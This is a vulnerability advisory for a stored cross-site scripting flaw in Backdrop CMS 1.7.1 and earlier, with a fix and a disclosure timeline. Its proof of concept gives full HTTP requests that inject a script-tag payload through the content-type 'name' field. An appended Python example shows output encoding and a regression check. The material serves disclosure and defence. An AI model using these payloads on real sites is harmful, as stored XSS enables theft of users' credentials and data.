=============================================
MGC ALERT 2017-005
- Original release date: July 11, 2017
- Last revised: August 18, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

II. BACKGROUND
-------------------------
Backdrop CMS is a simple, lightweight, and easy to use Content Management System used to build attractive, professional websites.

III. DESCRIPTION
-------------------------
A persistent XSS vulnerability has been detected in Backdrop CMS that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT
-------------------------
Go to: Structure -> Content types -> Add content type

And post:

POST /backdrop/admin/structure/types/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
Referer: http://127.0.0.1/backdrop/admin/structure/types/add
Cookie: Backdrop.tableDrag.showWeight=0; PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en; phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=120.60.120%257C%252F%257C; nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D; nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean; SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo
Connection: close
Upgrade-Insecure-Requests: 1

name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields

The "name" parameter is not sanitized. Later, if you open the created content type and click "Manage Displays", the following request is sent:

GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate

The XSS is executed; in the response you can see:

Manage display
Customized for test">

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Backdrop CMS <= 1.7.1

VII. SOLUTION
-------------------------
Install the latest release:
https://github.com/backdrop/backdrop/releases/tag/1.7.2

VIII. REFERENCES
-------------------------
https://backdropcms.org/security/backdrop-sa-core-2017-009

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
July 11, 2017 1: Initial release
August 18, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Sent to vendor
August 17, 2017 3: Vendor fix in 1.7.2 version
August 18, 2017 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
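The defect in section IV is a stored value (the content type "name") written back into the "Manage display" page without output encoding. The following added example (not Backdrop's own code, and not from the advisory's author) decodes the PoC form body, shows the unencoded rendering next to an output-encoded one, and gives a check a regression test can run against a rendered page. The markup shape is assumed, as is the payload-only form body.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed: the PoC form body from section IV, trimmed to the field that matters.
POC_BODY = (
    "name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E"
    "&type=test_script_alert&op=Save+and+add+fields"
)


def content_type_name(body: str) -> str:
    """Return the decoded 'name' field as the CMS stores it (no sanitising at input)."""
    return parse_qs(body, keep_blank_values=True)["name"][0]


def render_manage_display_vulnerable(name: str) -> str:
    """Mimics the defect: the stored name is interpolated into markup verbatim."""
    return f"<h2>Manage display</h2><p>Customized for {name}</p>"


def render_manage_display_fixed(name: str) -> str:
    """Hardened rendering: encode at output so the name is shown literally."""
    return f"<h2>Manage display</h2><p>Customized for {html.escape(name, quote=True)}</p>"


# Raw (not entity-encoded) opening script tag anywhere in the markup.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_unescaped_script(markup: str) -> bool:
    """Regression check: does a raw <script> tag survive in the rendered output?"""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    name = content_type_name(POC_BODY)
    print("stored name:", name)
    print("vulnerable page executes script:", contains_unescaped_script(render_manage_display_vulnerable(name)))
    print("fixed page executes script:", contains_unescaped_script(render_manage_display_fixed(name)))
```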